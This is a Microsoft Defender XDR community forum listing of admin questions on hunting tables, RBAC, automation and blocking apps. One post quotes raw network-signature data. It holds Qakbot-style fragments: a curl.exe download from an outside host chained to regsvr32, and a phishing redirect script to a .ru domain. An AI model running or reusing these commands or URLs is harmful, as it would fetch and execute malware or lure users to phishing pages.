Microsoft Defender XDR topics

Fishing linking passwords and data

79470Valen — Thu, 02 Apr 2026 15:06:48 GMT

activar control de seguridad mejorada antivirus maleware and fishing data

Why there is no Signature status for the new process in the DeviceProcessEvent table?

rstanile — Thu, 12 Mar 2026 09:22:30 GMT

According to the schema, there is only field for checking the initiating (parent) process digital signature, named InitiatingProcessSignatureStatus. So we have information if the process that initiated the execution is signed. However, in many security use-cases it is important to know if the spawned (child) process is digitally signed.

Let's assume that Winword.exe (signed) executed unsigned binary - this is definitely different situation than Winword.exe executing some signed binary (although both may be suspicious, or legitimate).

I feel that some valuable information is not provided, and I'd like to know the reason. Is it related to the logging performance? Or some memory structures, that are present only for the already existing process?

Issues blocking DeepSeek

KevinJohnson1 — Thu, 26 Feb 2026 02:45:18 GMT

Hi all,

I am investigating DeepSeek usage in our Microsoft security environment and have found inconsistent behaviour between Defender for Cloud Apps, Defender for Endpoint, and IOC controls. I am hoping to understand if others have seen the same.

Environment

Full Microsoft security and management suite

What we are seeing

Defender for Cloud Apps

DeepSeek is classified as an Unsanctioned app

Cloud Discovery shows ongoing traffic and active usage

Multiple successful sessions and data activity visible

Defender for Endpoint Indicators

DeepSeek domains and URIs have been added as Indicators with Block action

Indicators show as successfully applied

Advanced Hunting and Device Timeline

Multiple executable processes are initiating connections to DeepSeek domains

Examples include Edge, Chrome, and other executables making outbound HTTPS connections

Connection status is a mix of Successful and Unsuccessful

No block events recorded

Settings

Network Protection enabled in block mode

Web Content Filtering enabled

SmartScreen enabled

File Hash Computation enabled

Network Protection Reputation mode set to 1

Has anyone else had similar issues when trying to block DeepSeek or other apps via Microsoft security suite?

I am currently working with Microsoft support on this but wanted to ask here as well.

Observed Automation Discrepancies

Aar123 — Mon, 09 Feb 2026 08:54:18 GMT

Hi Team ... I want to know the logic behind the Defender XDR Automation Engine . How it works ?

I have observed Defender XDR Automation Engine Behavior contrary to expectations of identical incident and automation handling in both environments, discrepancies were observed. Specifically, incidents with high-severity alerts were automatically closed by Defender XDR's automation engine before reaching their SOC for review, raising concerns among clients and colleagues. Automation rules are clearly logged in the activity log, whereas actions performed by Microsoft Defender XDR are less transparent .

A high-severity alert related to a phishing incident was closed by Defender XDR's automation, resulting in the associated incident being closed and removed from SOC review. Wherein the automation was not triggered by our own rules, but by Microsoft's Defender XDR, and sought clarification on the underlying logic.

Invalidating kerberos tickets via XDR?

JoelNyRe — Mon, 26 Jan 2026 19:40:38 GMT

Since we have alerts every now and then, regarding suspected Pass the Ticket-incidents, I want to know if there's a way to make a user's kerberos ticket invalid? Like we have the "Revoke Session" in Entra ID, is there anything similar that we can do in XDR?

Where can I get the latest info on Advanced Hunting Table Retirement

david_n_o — Tue, 20 Jan 2026 11:35:09 GMT

First question - where can I find the latest info on the deprecation of advanced hunting tables?

Background - I was developing some detections and as I was trying to decide on which table I should use I opened up the docs containing the schema for the `EntraIdSignInEvents` table (https://learn.microsoft.com/en-us/defender-xdr/advanced-hunting-entraidsigninevents-table) and was met by two ambiguous banners stating:

"On December 9, 2025, the EntraIdSignInEvents table will replace AADSignInEventsBeta. This change will be made to remove the latter's preview status and to align it with the existing product branding. Both tables will coexist until AADSignInEventsBeta is deprecated after the said date.

To ensure a smooth transition, make sure that you update your queries that use the AADSignInEventsBeta table to use EntraIdSignInEvents before the previously mentioned date. Your custom detections will be updated automatically and won't require any changes."

"Some information relates to prereleased product that may be substantially modified before it's commercially released. Microsoft makes no warranties, express or implied, with respect to the information provided here.

Customers need to have a Microsoft Entra ID P2 license to collect and view activities for this table."

This made me very confused as I still have data from AADSignInEventsBeta on my tenant from today. I'm not sure what this means and I'm hoping to get some clear info on table retirement.

Entity playbook in XDR

Kosa — Fri, 19 Dec 2025 10:08:37 GMT

Hello All!

In my Logic Apps Sentinel automations I often use the entity trigger to run some workflows. Some time ago there was information, that Sentinel will be moved to the Microsoft XDR, some of the Sentinel elements are already there. In XDR I can run playbook from the incident level, but I can't do it from the entity level - for example in the XDR when I clicked in the IP or when I open IP address page I can't find the Run playbook button or something like that.

Do you know if the Run playbook on entity feature will be moved to XDR also?

Best,
Piotr K.

Scam Defender pop Up… help please

Hmartin1 — Thu, 18 Dec 2025 18:07:46 GMT

Can someone please help

my dad has had what looks like scam pop ups come up on his MacBook

I have reported to Microsoft but don’t know how long it will be until they get back to me.
I want to know if anyone can confirm they’re scams and how I can get them off his screen, it won’t let us click on the X

Thank you

Custom Data Collection - Not Collect Events

GuidoImpe — Tue, 09 Dec 2025 13:46:42 GMT

Hello,

Have anyone test or implement Custom Data Collection from Defender XDR ?

I try to use this function, i create rule and attach Sentinel Workspace, but for Example the "DeviceCustomProcessEvents" Table remains empty.

But with comand "DeviceProcessEvents" there are events that match the rule that i create.

There is another person that have the same issues ?

Many thanks,

Regards,

Guido

NetworkSignatureInspected

MrD — Fri, 28 Nov 2025 10:22:04 GMT

Hi,

Whilst looking into something, I was thrown off by a line in a device timeline export, with ActionType of NetworkSignatureInspected, and the content.

I've read this article, so understand the basics of the function:

Enrich your advanced hunting experience using network layer signals from Zeek

I popped over to Sentinel to widen the search as I was initially concerned, but now think it's expected behaviour as I see the same data from different devices.

Can anyone provide any clarity on the contents of AdditionalFields, where the ActionType is NetworkSignatureInspected, references for example CVE-2021-44228:

${token}/sendmessage`,{method:"post",%90%00%02%10%00%00%A1%02%01%10*%A9Cj)|%00%00$%B7%B9%92I%ED%F1%91%0B\%80%8E%E4$%B9%FA%01.%EA%FA<title>redirecting...</title><script>window.location.href="https://uyjh8.phiachiphe.ru/bjop8dt8@0uv0/#%90%02%1F@%90%02%1F";%90%00!#SCPT:Trojan:BAT/Qakbot.RVB01!MTB%00%02%00%00%00z%0B%01%10%8C%BAUU)|%00%00%CBw%F9%1Af%E3%B0?\%BE%10|%CC%DA%BE%82%EC%0B%952&&curl.exe--output%25programdata%25\xlhkbo\ff\up2iob.iozv.zmhttps://neptuneimpex.com/bmm/j.png&&echo"fd"&&regsvr32"%90%00!#SCPT:Trojan:HTML/Phish.DMOH1!MTB%00%02%00%00%00{%0B%01%10%F5):[)|%00%00v%F0%ADS%B8i%B2%D4h%EF=E"#%C5%F1%FFl>J<scripttype="text/javascript">window.location="https://

Defender reports no issues on the device and logs (for example DeviceNetworkEvents or CommonSecurityLog) don't return any hits for the sites referenced.

Any assistance with rationalising this would be great, thanks.

How to stop incidents merging under new incident (MultiStage) in defender.

smavrakis — Tue, 25 Nov 2025 14:17:12 GMT

Dear All

We are experiencing a challenge with the integration between Microsoft Sentinel and the Defender portal where multiple custom rule alerts and analytic rule incidents are being automatically merged into a single incident named "Multistage." This automatic incident merging affects the granularity and context of our investigations, especially for important custom use cases such as specific admin activities and differentiated analytic logic.

Key concerns include:

Custom rule alerts from Sentinel merging undesirably into a single "Multistage" incident in Defender, causing loss of incident-specific investigation value.
Analytic rules arising from different data sources and detection logic are merged, although they represent distinct security events needing separate attention.
Customers require and depend on distinct, non-merged incidents for custom use cases, and the current incident correlation and merging behavior undermines this requirement.

We understand that Defender’s incident correlation engine merges incidents based on overlapping entities, timelines, and behaviors but would like guidance or configuration best practices to disable or minimize this automatic merging behavior for our custom and analytic rule incidents. Our goal is to maintain independent incidents corresponding exactly to our custom alerts so that hunting, triage, and response workflows remain precise and actionable.

Any recommendations or advanced configuration options to achieve this separation would be greatly appreciated.

Thank you for your assistance.

Best regards

Security Admin role replacement with Defender XDR

Sharmila1 — Wed, 19 Nov 2025 12:28:51 GMT

We currently have the Security Administrator role assigned to multiple users in our organization. We are considering replacing it with custom RBAC roles in Microsoft Defender XDR as described in Custom roles for role-based access control - Microsoft Defender XDR | Microsoft Learn

Our goal is to provide these users full access to the Microsoft Defender security portal so they can respond to alerts and manage security operations. They do not require access to the Entra ID portal for tasks such as managing conditional access policies or authentication method policies.

Can we completely remove the Security Administrator role and rely solely on the custom RBAC role in Defender XDR to meet these requirements?

Custom data collection in MDE - what is default?

AndAufVCG — Wed, 19 Nov 2025 09:44:53 GMT

So you just announced the preview of "Custom data collection in Microsoft Defender for Endpoint (Preview)" which lets me ingest custom data to sentinel.

Is there also an overview of what is default and what I can add?

e.g. we want to examine repeating disconnects from AzureVPN clients
(yes, it's most likely just Microsoft's fault, as the app ratings show 'everyone' is having them)
How do I know which data I can add to DeviceCustomNetworkEvents which isnt already in DeviceNetworkEvents?

Permissions to see and manage sentinel workspace in Defender XDR

Abn_V — Thu, 13 Nov 2025 07:56:14 GMT

Hi Team,

One of my customers recently completed their Sentinel → Defender portal migration. Initially, I didn’t have access to view the Defender portal, but after the migration I was assigned the Security Operator role in Entra (via PIM), which now allows me to access the Defender portal.However, when I navigate to:
Defender portal → System → Settings → Microsoft Sentinel → Workspaces. I’m unable to view the available workspaces. The portal shows an insufficient permissions error, and I also cannot switch the primary/secondary workspace. Could you please advise on the exact permissions/roles required to: View the Sentinel workspace list in Defender, and Switch the primary workspace? Thanks in advance

XDR RBAC missing Endpoint & Vulnerability Management

MikeLister — Tue, 11 Nov 2025 21:54:35 GMT

I've been looking at ways to provide a user with access to the Vulnerability Dashboard and associated reports without giving them access to anything else within Defender (Email, Cloud App etc) looking at the article Activate Microsoft Defender XDR Unified role-based access control (RBAC) - Microsoft Defender XDR | Microsoft Learn it has a slider for Endpoint Management which I don't appear to have?

I have business Premium licences which give me GA access to see the data so I know I'm licenced for it and it works but I can't figure out how to assign permissions.

When looking at creating a custom permission here Permissions in Microsoft Defender XDR Unified role-based access control (RBAC) - Microsoft Defender XDR | Microsoft Learn it mentions Security Posture Management would give them Vulnerability Management Level Read which is what I'm after but that doesn't appear to be working. The test account i'm using to try this out just gets an error

Error getting device data

I'm assuming its because it doesn't have permissions of the device details?

Explorer permission to download an email

underQualifried — Tue, 04 Nov 2025 19:08:46 GMT

Global Admin is allegedly not sufficient access to download an email. So I have a user asking for a copy of her emaill, and I'm telling her 'sorry, I don't have that permission', I'm only global admin'

What?

The documentation basically forces you to use the new terrible 'role group' system. I see various 'roles' that you need to add to a 'role group' in order to do this.. Some mention Preview, some mention Security Administrator, some mention Security Operator. I've asked copilot 100 different times, and he keeps giving me made up roles. But then linking to the made up role.

How is such a basic functionality broken? It makes 0 sense. I don't want to submit this email - it's not malware or anything. I just want to download the **bleep** thing, and I don't want to have to go through the whole poorview process. This is really basic stuff. I can do this on about 10% of my GA accounts. There's no difference in the permissions - it just seems inconsistent.

XDR advanced hunting region specific endpoints

ghostrider31 — Thu, 30 Oct 2025 17:10:15 GMT

Hi, I am exploring XDR advanced hunting API to fetch data specific to Microsoft Defender for Endpoint tenants. The official documentation (https://learn.microsoft.com/en-us/defender-xdr/api-advanced-hunting) mentions to switch to Microsoft Graph advanced hunting API. I had below questions related to it:

1. To fetch the region specific(US , China, Global) token and Microsoft Graph service root endpoints(https://learn.microsoft.com/en-us/graph/deployments#app-registration-and-token-service-root-endpoints ) , is the recommended way to fetch the OpenID configuration document (https://learn.microsoft.com/en-us/entra/identity-platform/v2-protocols-oidc#fetch-the-openid-configuration-document) for a tenant ID and based on the response, the region specific SERVICE/TOKEN endpoints could be fetched? Since using it, there is no need to maintain different end points for tenants in different regions. And do we use the global service URL https://login.microsoftonline.com to fetch OpenID config document for a tenantID in any region?

2. As per the documentation, Microsoft Graph Advanced hunting API is not supported in China region (https://learn.microsoft.com/en-us/graph/api/security-security-runhuntingquery?view=graph-rest-1.0&tabs=http). In this case, is it recommended to use Microsoft XDR Advanced hunting APIs(https://learn.microsoft.com/en-us/defender-xdr/api-advanced-hunting) to support all region tenants(China, US, Global)?

XDR Advanced hunting API region availability

ghostrider31 — Thu, 30 Oct 2025 15:39:46 GMT

To fetch the region specific(US , China, Global) token and Microsoft Graph service root endpoints(https://learn.microsoft.com/en-us/graph/deployments#app-registration-and-token-service-root-endpoints ) , is the recommended way to fetch the OpenID configuration document (OpenID Connect (OIDC) on the Microsoft identity platform - Microsoft identity platform | Microsoft Learn) for a tenant ID and based on the response, the region specific SERVICE/TOKEN endpoints could be fetched? Using it, there is no need to maintain different end points for tenants in different regions. And do we use the global service URL https://login.microsoftonline.com to fetch OpenID config document for a tenantID in any region?
As per the documentation, Microsoft Graph Advanced hunting API is not supported in China region (security: runHuntingQuery - Microsoft Graph v1.0 | Microsoft Learn). In this case, is it recommended to use Microsoft XDR Advanced hunting APIs(Microsoft Defender XDR advanced hunting API - Microsoft Defender XDR | Microsoft Learn) to support all region tenants(China, US, Global)?

Defender for Endpoint | Deception

StanPetrov — Tue, 28 Oct 2025 16:46:12 GMT

Hi Everyone,
I hope this topic is going to help someone.
I want to know after 31 of October 2025

Does that mean that no one can run Deceptions and policy rules, etc?
As at the moment I'm experiencing this:

It would be good to know if I have to deal with it and look into what the issue is, as I'm using Zscaler. The issue is definitely there after running a number of commands to check the reg key, etc.
Can someone provide me with any documentation if this will be fully retired or will still be functioning to some point?

Question malware autodelete

cloudff7 — Sat, 25 Oct 2025 15:28:51 GMT

A malware like Trojan:Win32/Wacatac.C!ml can download other malware, this other malware can perform the malicious action, this malware can delete itself and in the next scan of antivirus free this malware that deleted itself will not have any trace and will not be detected by the scan?